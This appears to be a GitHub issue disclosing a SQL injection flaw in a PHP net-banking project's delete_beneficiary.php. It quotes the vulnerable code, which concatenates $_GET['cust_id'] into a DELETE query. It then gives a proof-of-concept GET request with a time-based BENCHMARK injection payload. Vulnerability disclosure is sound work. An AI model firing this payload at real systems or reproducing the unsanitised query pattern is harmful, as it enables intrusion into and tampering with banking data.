You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
net-banking/delete_beneficiary.php from line 17,The $_GET['cust_id'] parameter is controllable, the parameter cust_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 21 if (($conn->query($sql0) === TRUE)) made a sql query,resulting in sql injection
......
......
......
if (isset($_GET['cust_id'])) {
$sql0 = "DELETE FROM beneficiary".$_SESSION['loggedIn_cust_id'].
" WHERE benef_cust_id=".$_GET['cust_id'];
}
$success = 0;
if (($conn->query($sql0) === TRUE)) {
$sql0 = "SELECT MAX(benef_id) FROM beneficiary".$_SESSION['loggedIn_cust_id'];
$result = $conn->query($sql0);
$row = $result->fetch_assoc();
......
......
......
POC
GET /net-banking/delete_beneficiary.php?cust_id=666 AND 3629=BENCHMARK(5000000,MD5(0x7a6f6b4e)) HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3Upgrade-Insecure-Requests: 1
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
net-banking/delete_beneficiary.phpfrom line 17,The$_GET['cust_id']parameter is controllable, the parameter cust_id can be passed through get, and the$_GET['cust_id']is not protected from sql injection, line 21if (($conn->query($sql0) === TRUE))made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: